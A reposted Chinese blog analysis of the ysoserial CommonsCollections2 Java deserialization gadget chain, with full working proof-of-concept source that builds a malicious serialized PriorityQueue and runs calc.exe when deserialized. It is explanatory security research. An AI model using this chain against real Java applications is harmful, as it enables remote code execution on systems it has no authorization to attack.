2. 程式人生 > >java反序列化-ysoserial-除錯分析總結篇(2)

java反序列化-ysoserial-除錯分析總結篇(2)

阿新 發佈:2020-02-29

前言:

這篇主要分析commonCollections2,呼叫鏈如下圖所示:

呼叫鏈分析:

分析環境:jdk1.8.0

 反序列化的入口點為src.zip!/java/util/PriorityQueue.java

 此時將會對佇列呼叫siftdown函式,其中佇列中包含了兩個元素,其中一個即為templatesImpl惡意類

 接下來呼叫siftDownUsingConparator函式

 在這裡將呼叫TransformingComparator的compare函式,在這裡就到了新的漏洞觸發點,this.transformer.transform(),而這裡的this.transformer即為invokerTransformer,

在commoncollections1中第一次呼叫的是Lazymap的this.factory.transform,而這裡是priorityQueue.java的compare裡的this.transformer.transform

 

 而invokeTransformer中將反射呼叫,templatesImple的newTranformer方法,以前分析fastjson1.2.24時候也用的是這個內建的TemplatesImple類,其有getoutputProperties也將呼叫newTransformer()

接著套路思路就是在newTransformer中例項化我們的惡意位元組碼中包含的類,從而呼叫其static程式碼塊或者構造方法中的rce程式碼

 

 ysoserial-exp構造

分析完呼叫鏈以後看看ysoserial是如何構造payload的

 首先建立TemplatesImpl例項

 Class.forName載入三個需要用到的類,然後呼叫過載的TemplatesImpl來建立例項,這裡用到的技術是javassist操作類的位元組碼

接下來要對我們_bytecode欄位所要儲存的惡意位元組碼類進行操作,這裡首先將兩個類放到pool中

 其中SubTransletpaylod就是存放rce程式碼的類

 接下來從pool中取出要操作的類,來操作其位元組碼

 接下來該類建立static程式碼塊,並且加入rce的程式碼,這裡的程式碼可以自定義,讀寫檔案也可以

 然後給該類重新設定名字,其實這個可以省略,接下來給該類設定父類為tranlet,其實這裡也可以不設定,payload類裡已經設定好了

 之後將rce類的位元組碼放到_bytecodes屬性中,再設定其他依賴屬性_name和_tfactory即可返回templatesImpl類

 接著定義需要反射呼叫的方法,這裡首先用tostring進行填充,後面再放入newtransformer,宣告要反序列化的佇列priorityQueue,容量為2

然後反射設定invoketransformer的方法為newtransformer來替換原來的tostring,然後再將queue中的兩個元素替換成templatesImpl類的例項,從而結束整個構造過程,因此構造分為三步

1.構造用於執行rce的類

2.構造templatesImpl類的例項,將1中的類填充

3.將2中的類填充到priorityqueue佇列中,返回obj

手動編寫exp:

exp.java

package CommonCollections2;

import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;
import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

public class exp {
    public static void main(String[] args) throws ClassNotFoundException, NotFoundException, IOException, CannotCompileException, NoSuchFieldException, IllegalAccessException {
        TemplatesImpl tmp = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(payload.class));
        CtClass clazz = pool.get(payload.class.getName());
        final byte[] clazzByte = clazz.toBytecode();

        //_bytecode為private,需要設定可訪問
        Field _btcode = TemplatesImpl.class.getDeclaredField("_bytecodes");
        _btcode.setAccessible(true);
        _btcode.set(tmp,new byte[][]{clazzByte});

        //_name不為空即可
        Field _name = TemplatesImpl.class.getDeclaredField("_name");
        _name.setAccessible(true);
        _name.set(tmp,"tr1ple");

        //_tfactory可為空
        Field _tf = TemplatesImpl.class.getDeclaredField("_tfactory");
        _tf.setAccessible(true);
        _tf.set(tmp,null);

        //
        //構造priorityqueue物件
        //
        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);

        InvokerTransformer trans = new InvokerTransformer("newTransformer",new Class[0],new Object[0]);
        //InvokerTransformer trans = new InvokerTransformer("getOutputProperties",new Class[0],new Object[0]); //呼叫該方法一樣的效果
        
        //依賴collections4
        TransformingComparator com = new TransformingComparator(trans);

        Field ComFi = PriorityQueue.class.getDeclaredField("comparator");
        ComFi.setAccessible(true);
        ComFi.set(queue,com);

        Field qu = PriorityQueue.class.getDeclaredField("queue");
        qu.setAccessible(true);
        Object[] objOutput = (Object[])qu.get(queue);
        objOutput[0] = tmp;
        objOutput[1] = 1;

        //序列化
        File file;
        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser");
        OutputStream out = new FileOutputStream(file);
        ObjectOutputStream obj = new ObjectOutputStream(out);
        obj.writeObject(queue);
        obj.close();



    }
}

 

payload.java

package CommonCollections2;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;
import java.io.Serializable;

public class payload extends AbstractTranslet  implements Serializable {
    {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public payload(){
        System.out.println("tr1ple 2333");
    }
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

readObj.java

package CommonCollections2;

import java.io.*;

public class readObj {
    public static void main(String[] args) {
        try {
            FileInputStream fio = new FileInputStream(new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser"));
            ObjectInputStream obj = new ObjectInputStream(fio);
            obj.readObject();
            obj.close();
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
    }
}

測試結果:

如下圖所示,_bytecode中的類將被例項化,呼叫static程式碼塊的程式碼和建構函式中的程式碼

總結:

整個呼叫鏈的重點是在對佇列元素排序時可以自定義比較器進行轉換從而觸發反射呼叫佇列元素的成員方法,相對於cc1來說構造感覺更精巧一點,這個內部TemplatesImpl類也是jdk內建的,攻擊效果也不受到jdk版本影響,只要cc4.0的依賴存在即可

&n

相關推薦

java序列-ysoserial-除錯分析總結(2)

前言: 這篇主要分析commonCollections2,呼叫鏈如下圖所示: 呼叫鏈分析: 分析環境:jdk1.8.0  反序列化的入口點為src.zip!/java/util/PriorityQueue.java  此時將會對佇列呼叫siftdown函式,其中佇列中包含了兩個元素,

java序列-ysoserial-除錯分析總結(3)

前言: 這篇文章主要分析commoncollections3,這條利用鏈如yso描述,這個與cc1類似,只是反射呼叫方法是用的不是invokeTransformer而用的是InstantiateTransformer,整個呼叫過程如下圖 利用鏈分析: 如上圖所示,入口點還是Annotationinvoa

java序列-ysoserial-除錯分析總結(6)

前言: 這篇記錄CommonsCollections6的除錯,外層也是新的類,換成了hashset,即從hashset觸發其readObject(),yso給的呼叫鏈如下圖所示 利用鏈分析: 首先在hashset內部首先獲取器容量與負載因子等操作,然後建立hashmap,將ObjectinputStrea

java序列-ysoserial-除錯分析總結(7)

前言: CommonsCollections7外層也是一條新的構造鏈,外層由hashtable的readObject進入,這條構造鏈挺有意思,因為用到了hash碰撞 yso構造分析: 首先構造進行rce所需要的轉換鏈,這裡也用的是chianed裡面套Constantrans+invoketrans的方法

java序列Commons-Collections1分析

Commons-Collections1也是利用InvokerTransformer類中的transform方法反射機制執行命令。實驗用的是commons-collections 3.1這裡說一下為什麼呼叫構造elEntry.setValue("hahah");就會彈計算器。poc前一步需要理解如下程式碼:

ysoserial-除錯分析總結(1)

前言: ysoserial很強大,花時間好好研究研究其中的利用鏈對於瞭解java語言的一些特性很有幫助,也方便打好學習java安全的基礎,剛學反序列化時就分析過commoncollections,但是是跟著網上教程,自己理解也不夠充分,現在重新根據自己的除錯進行理解,這篇文章先分析URLDNS和commonC

關於metaspolit中進行JAVA序列滲透RMI的原理分析

resp format shel git led 技術 文件 error: return 一、背景: 這裏需要對java反序列化有點了解,在這裏得推廣下自己的博客嘛,雖然寫的不好,廣告還是要做的。原諒我: 1、java反序列化漏洞原理研習 2、java反序列化漏洞的檢測 二

Java序列漏洞分析

https://xz.aliyun.com/t/136  寫的挺詳細的,大致瞭解了,整個流程,有點事,之後在細跟 目錄 1. 背景 2. 認識java序列化與反序列化 3. 理解漏洞的產生 4. POC構造 5. 實際漏洞環境測試 6. 總結 背景   2015年11月

懸鏡安全丨Java 序列任意程式碼執行漏洞分析與利用

本文首發平臺:懸鏡官網,如需轉載,請聯絡小編,謝謝。        2015年的1月28號,Gabriel Lawrence (@gebl)和Chris Frohoff (@frohoff)在AppSecCali上給出了一個報告[3],報告中介紹了Java反序列化漏洞可以利用Apache Commons

Java序列漏洞總結

新的 私有 orm decorate 靈活 調用 序列 很好 方式 前言 什麽是序列化和反序列化 Java 提供了一種對象序列化的機制,該機制中,一個對象可以被表示為一個字節序列,該字節序列包括該對象的數據、有關對象的類型的信息和存儲在對象中數據的類型。反序列化就是通過

java序列——apache-shiro復現分析

本文首發於“合天智匯”公眾號 作者:Fortheone 看了好久的文章才開始分析除錯java的cc鏈,這個鏈算是java反序列化漏洞裡的基礎了。分析除錯的shiro也是直接使用了cc鏈。首先先了解一些java的反射機制。 一、什麼是反射: 反射是Java的特徵之一,是一種間接操作目標物件的機制,核心

java序列漏洞的檢測

spa div ria comm span Coding python odin ima 1、首先下載常用的工具ysoserial 這邊提供下載地址:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-

java序列漏洞原理研習

java程序 out import 修改 sed 判斷 pub 發現 commons 零、Java反序列化漏洞   java的安全問題首屈一指的就是反序列化漏洞,可以執行命令啊,甚至直接getshell,所以趁著這個假期好好研究一下java的反序列化漏洞。另外呢,組裏多位大

Java序列漏洞的挖掘、攻擊與防禦

body per 所有 http 操作 www except ride 方法 一、Java反序列化漏洞的挖掘 1、黑盒流量分析: 在Java反序列化傳送的包中,一般有兩種傳送方式,在TCP報文中,一般二進制流方式傳輸,在HTTP報文中,則大多以base64傳輸。因而在流量中

序列序列技術的分析和選擇

dia 效率 個性化 擴展 綁定 嵌入 成熟 內存 字段 轉自:https://tech.meituan.com/serialization_vs_deserialization.html 美團點評技術團隊的文章 #摘要序列化和反序列化幾乎是工程師們每天都要面對的事情,但是

java序列原理-Demo(一)

51cto n) www. fault clas ack 保存 發現 auto java反序列化原理-Demo(一) 0x00 什麽是java序列化和反序列? Java 序列化是指把 Java 對象轉換為字節序列的過程便於保存在內存、文件、數據庫中,ObjectOutput

java序列原理-Demo(二)

mage ins bytearray stream utc 繼承 etc input exceptio java反序列化原理-Demo(二) 0x00 測試代碼以及運行結果 測試代碼: package test; import java.io.ByteArrayInput

java序列 - Transformer類可以執行惡意代碼的原理

write bject calc == return cal leg invoke stack java反序列化 - Transformer類可以執行惡意代碼的原理 0x00 代碼 Transformer[] transformers = new Transformer[]

java序列 - transformedMap類可以執行惡意代碼的原理

clas invoke 序列化 pri [] nag roc map.entry 什麽 java反序列化 - transformedMap類可以執行惡意代碼的原理 0x00 代碼 Map map=new HashMap(); map.put("key","

第九屆極客大挑戰——怎麼又是江師傅的祕密(java序列

引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。